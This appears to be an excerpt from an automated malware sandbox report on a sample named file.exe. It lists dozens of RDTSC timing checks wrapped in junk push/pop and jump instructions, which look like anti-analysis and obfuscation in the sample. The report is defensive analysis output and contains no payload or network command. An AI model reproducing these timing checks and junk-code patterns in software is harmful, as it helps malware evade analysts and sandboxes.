                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E7276 second address: 2E729E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED12076Ah 0x00000009 popad 0x0000000a jmp 00007FD7ED120771h 0x0000000f jo 00007FD7ED12076Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6CFC second address: 2E6D06 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD7ECCCADECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA271 second address: 2EA28D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD7ED120772h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA28D second address: 2EA29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD7ECCCADE6h 0x0000000a jng 00007FD7ECCCADE6h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA29D second address: 2EA2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA2A1 second address: 2EA2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3903 second address: 2F390F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F390F second address: 2F3913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3402 second address: 2F3406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3584 second address: 2F35DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ECCCAE15h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD7ECCCADEBh 0x00000012 jmp 00007FD7ECCCADF1h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F35DC second address: 2F35F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120774h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F35F6 second address: 2F35FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB25B second address: 2FB273 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD7ED120766h 0x00000012 jc 00007FD7ED120766h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB273 second address: 2FB277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3049A2 second address: 3049A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3049A6 second address: 3049B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309044 second address: 30907E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120773h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jbe 00007FD7ED120766h 0x00000011 jmp 00007FD7ED120774h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 310F0C second address: 310F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311218 second address: 311224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD7ED120768h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311224 second address: 311253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD7ECCCAE0Fh 0x0000000f jmp 00007FD7ECCCADF7h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311253 second address: 31125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311F89 second address: 311F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316419 second address: 316433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120776h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 323F94 second address: 323FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FD7ECCCADE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C518 second address: 32C522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C522 second address: 32C53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF6h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C53C second address: 32C540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C540 second address: 32C54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32275E second address: 3227A5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ED120766h 0x00000008 jmp 00007FD7ED120778h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FD7ED120768h 0x00000015 jnl 00007FD7ED12076Ah 0x0000001b pushad 0x0000001c popad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push ecx 0x00000020 jnc 00007FD7ED120766h 0x00000026 pop ecx 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007FD7ED12076Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227A5 second address: 3227B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ECCCADE8h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227B1 second address: 3227BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FD7ED120766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3391DC second address: 3391E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3391E2 second address: 3391EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351548 second address: 351574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 jmp 00007FD7ECCCADF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351574 second address: 3515C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FD7ED12076Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 jmp 00007FD7ED120770h 0x00000018 jg 00007FD7ED120766h 0x0000001e pop edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007FD7ED120778h 0x00000027 pop edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518A9 second address: 3518AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518AD second address: 3518B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518B3 second address: 3518D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD7ECCCADF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518D3 second address: 3518DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518DD second address: 3518FC instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ECCCADEAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnl 00007FD7ECCCADE8h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007FD7ECCCADE6h 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351EA3 second address: 351EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351EA9 second address: 351EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352168 second address: 35216C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35216C second address: 352189 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD7ECCCADE8h 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FD7ECCCADE8h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3522F0 second address: 3522F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3522F6 second address: 352311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD7ECCCADF2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355284 second address: 355295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FD7ED120766h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355295 second address: 35529A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35668F second address: 356699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356699 second address: 3566CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 jmp 00007FD7ECCCADF2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007FD7ECCCADEAh 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3566CB second address: 3566D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357E63 second address: 357E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD7ECCCADE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359D37 second address: 359D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359D3B second address: 359D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD7ECCCADF6h 0x0000000d jmp 00007FD7ECCCADEAh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD7ECCCADEAh 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FD7ECCCADEFh 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486005B second address: 48600CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED12076Fh 0x00000009 and cx, A06Eh 0x0000000e jmp 00007FD7ED120779h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD7ED120770h 0x0000001a sub ecx, 6D1A6BE8h 0x00000020 jmp 00007FD7ED12076Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD7ED120774h 0x00000031 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48600CA second address: 4860117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1574B6F4h 0x00000008 pushfd 0x00000009 jmp 00007FD7ECCCADEDh 0x0000000e adc eax, 28EBA8B6h 0x00000014 jmp 00007FD7ECCCADF1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ebx, eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD7ECCCADF6h 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860117 second address: 4860136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120772h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860136 second address: 4860153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840EF2 second address: 4840F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED120776h 0x00000009 sbb ecx, 05074B68h 0x0000000f jmp 00007FD7ED12076Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FD7ED120776h 0x0000001e push eax 0x0000001f jmp 00007FD7ED12076Bh 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 mov ax, D85Bh 0x0000002a mov si, 9F37h 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007FD7ED12076Ah 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD7ED12076Ah 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840F6A second address: 4840F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E9B second address: 4880EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD7ED120771h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FD7ED120773h 0x00000018 mov dx, ax 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48407C1 second address: 48407D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADEBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48407D1 second address: 4840816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FD7ED12076Fh 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007FD7ED120770h 0x00000017 and ax, AE28h 0x0000001c jmp 00007FD7ED12076Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840816 second address: 484081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484071B second address: 484071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484071F second address: 4840725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484046E second address: 4840492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ED12076Ch 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840492 second address: 4840498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880DC5 second address: 4880E0D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD7ED12076Bh 0x00000008 or esi, 650C4BAEh 0x0000000e jmp 00007FD7ED120779h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FD7ED12076Eh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E0D second address: 4880E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E11 second address: 4880E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E17 second address: 4880E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E1D second address: 4880E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E21 second address: 4880E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, si 0x00000012 mov cl, 28h 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48405A0 second address: 4840659 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD7ED12076Eh 0x00000008 sbb ch, FFFFFFB8h 0x0000000b jmp 00007FD7ED12076Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 4E05B9EFh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushad 0x0000001c mov ecx, 7354BA3Dh 0x00000021 pushfd 0x00000022 jmp 00007FD7ED12076Ah 0x00000027 or cx, 9018h 0x0000002c jmp 00007FD7ED12076Bh 0x00000031 popfd 0x00000032 popad 0x00000033 pushfd 0x00000034 jmp 00007FD7ED120778h 0x00000039 add cx, FA78h 0x0000003e jmp 00007FD7ED12076Bh 0x00000043 popfd 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 mov ah, bh 0x00000049 mov bx, si 0x0000004c popad 0x0000004d xchg eax, ebp 0x0000004e jmp 00007FD7ED12076Ah 0x00000053 mov ebp, esp 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push edx 0x00000059 pop ecx 0x0000005a pushfd 0x0000005b jmp 00007FD7ED120779h 0x00000060 jmp 00007FD7ED12076Bh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E34 second address: 4850E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E38 second address: 4850E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E4B second address: 4850E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADEFh 0x00000008 mov ecx, 290F340Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD7ECCCADF1h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E79 second address: 4850EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD7ED12076Ah 0x00000012 pop ecx 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850EA1 second address: 4850ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD7ECCCADF0h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD7ECCCADEAh 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850ED2 second address: 4850EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850EE1 second address: 4850EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADF4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860299 second address: 48602E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED12076Fh 0x00000009 xor eax, 4A8B9C5Eh 0x0000000f jmp 00007FD7ED120779h 0x00000014 popfd 0x00000015 mov ah, 85h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD7ED12076Fh 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48602E3 second address: 486030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0B7Ah 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD7ECCCADF9h 0x00000017 rdtsc
